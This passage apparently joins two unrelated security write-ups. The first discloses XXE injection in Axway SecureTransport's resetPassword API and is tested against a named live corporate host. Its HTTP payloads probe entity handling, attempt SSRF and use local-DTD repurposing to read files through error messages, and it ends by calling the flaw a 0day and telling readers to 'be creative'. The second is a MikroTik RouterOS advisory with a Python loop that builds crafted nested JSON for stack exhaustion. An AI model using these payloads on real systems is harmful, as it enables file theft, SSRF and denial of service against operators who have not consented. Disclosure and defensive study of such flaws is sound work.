  Content-Type: application/xml
  Referer: localhost

</email>
  ```

  HTTP Response:
  ```
  {
"message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 1; columnNumber: 2; The markup in the document preceding the root element must be well-formed.]"
  }
  ```


2. Verifying the vulnerability.

  HTTP Request:
  ```
  POST /api/v1.0/myself/resetPassword HTTP/1.1
  Host: securefile.costco.com
  Content-Type: application/xml
  Referer: localhost

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE resetPassword [
<!ENTITY thisactuallyexists SYSTEM "file:///dev/null">
  ]>
<resetPassword><email>&thisactuallyexists;&thisdoesnt;</email></resetPassword>
  ```

  HTTP Response:
  ```
  {
"message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 5; columnNumber: 48; The entity "thisdoesnt" was referenced, but not declared.]"
  }
  ```

  As you can see, the parser recognizes that "thisactuallyexists" was in fact declared. In the same error, we see that "thisdoesn't" was referenced, but not declared. This demonstrates that we can declare arbitrary entities.

  https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#detect-the-vulnerability


3. External Entity Injection (XXE) (hardened)

  NOTE: Because the server doesn't reflect the input anywhere, our only option is error-based XXE or out-of-band XXE. However, upon initial discovery, it appears as though most Axway SecureTransport installations have some type of firewall blocking all outgoing requests. This makes exploiting traditional XXE difficult. Judging by this, my only ideas on exploitation would be via blind SSRF or by repurposing an existing DTD on the filesystem to trigger an error with the file contents/result of our payload. However because I don't have a license, I can't effectively audit this software from a whitebox perspective, which makes mapping out internal attack surface difficult. The underlying vulnerability remains... but with restrictions.

  HTTP Request:
  ```
  POST /api/v1.0/myself/resetPassword HTTP/1.1
  Host: securefile.costco.com
  Content-Type: application/xml
  Referer: localhost

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE resetPassword [
<!ENTITY ssrf SYSTEM "http://localhost/SOMETHING_I_WISH_I_KNEW_EXISTED?NEW_PASSWORD=1337">
  ]>
<resetPassword><email>&ssrf;</email></resetPassword>
  ```

  HTTP Response:
  ```
  (empty)
  ```

  Local DTD repurposing example request:
  ```
  POST /api/v1.0/myself/resetPassword HTTP/1.1
  Host: securefile.costco.com
  Content-Type: application/xml
  Referer: localhost

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE resetPassword [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

<!ENTITY % expr 'aaa)>
<!ENTITY &#x25; file SYSTEM "file:///FILE_TO_READ">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ELEMENT aa (bb'>

      %local_dtd;
  ]>
<resetPassword></resetPassword>

  ```


4. More vulnerability-indicating errors:

  HTTP Request:
  ```
  POST /api/v1.0/myself/resetPassword HTTP/1.1
  Host: securefile.costco.com
  Content-Type: application/xml
  Referer: localhost

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE resetPassword [
<!ENTITY ssrf SYSTEM a >
  ]>
<resetPassword><email>&ssrf;</email></resetPassword>
  ```

  HTTP Response:
  ```
  {
"message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 3; columnNumber: 22; The system identifier must begin with either a single or double quote character.]"
  }
  ```

5. The original request

  HTTP Request:
  ```
  POST /api/v1.0/myself/resetPassword HTTP/1.1
  Host: securefile.costco.com
  Content-Type: application/xml
  Referer: localhost

<resetPassword><email>email@email.com</email></resetPassword>
  ```

  HTTP Response:
  ```
  (empty)
  ```


Conclusion:

If a determined attacker were to get to know the Axway SecureTransport software, the chances of successfully chaining this bug are high. DTD repurposing is a relatively new technique, however in the near future we will be seeing a lot more of this attack vector due to XML parser restrictions/firewalled networks. I didn't feel comfortable doing further testing as I don't have a license, meaning I'm limited to testing against live targets. So for now, enjoy the 0day. Be creative.


Remediation:

In order to avoid this vulnerability, it's suggested to disable both doctype declaration and external general entities. You can find more information on that here: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#java


Notes:

- Referer must be set.
- Content type must be xml.
- Successful request returns a HTTP/1.1 204 No Content
- Any type of invalid XML throws an SAXParser exception.
- If external entities were disabled... we should also recieve an exception.
- Same with doctype declaration.
- API endpoints can vary from /api/v1.0, /api/v1.1, /api/v1.2, /api/v1.3, /api/v1.4


References:

https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
https://gist.github.com/marcwickenden/acd0b23953b52e7c1a1a90925862d8e2
https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html
https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation

Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
=======

Product: MikroTik's RouterOS
Affected Versions: before 6.44.5 (Long-term release tree),
                   before 6.45.1 (Stable release tree)
Fixed Versions: 6.44.5 (Long-term release tree),
                6.45.1 (Stable release tree)
Vendor URL: https://mikrotik.com/download/changelogs/long-term-release-tree
Vendor Status: fixed version released
CVE: CVE-2019-13954, CVE-2019-13955
Credit: Qian Chen(@cq674350529) of the Qihoo 360 Nirvan Team


Product Description
==================

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Details of vulnerabilities
==========================

These two vulnerabilities were tested only against the MikroTik RouterOS
6.42.11 and 6.43.16 (Long-term release tree) when found.


1. CVE-2019-13954: memory exhaustion via a crafted POST request
This vulnerability is similiar to the CVE-2018-1157. An authenticated user
can cause the www binary to consume all memory via a crafted POST request
to /jsproxy/upload. It's because of the incomplete fix for the
CVE-2018-1157.

Based on the poc for cve_2018_1157 provided by the @Jacob Baines (really
appreciate!), crafting a filename ending with many '\x00' can bypass the
original fix to trigger the vulnerability.


2. CVE-2019-13955: stack exhaustion via recuring parsing of JSON
This vulnerability is similar to the CVE-2018-1158. An authenticated user
communicating with the www binary can trigger a stack exhaustion
vulnerability via recursive parsing of JSON containing message type M.

Based on the poc for cve_2018_1158 provided by the @Jacob Baines (really
appreciate!), crafting an JSON message with type M can trigger the
vulnerability. A simple python script to generate the crafted message is as
follows.

    msg = "{M01:[M01:[]]}"
    for _ in xrange(2000):
        msg = msg.replace('[]', "[M01:[]]")


Solution
========

Upgrade to RouterOS versions 6.44.5 (Long-term release tree), 6.45.1
(Stable release tree).


References
==========

[1] https://mikrotik.com/download/changelogs/long-term-release-tree
[2] https://github.com/tenable/routeros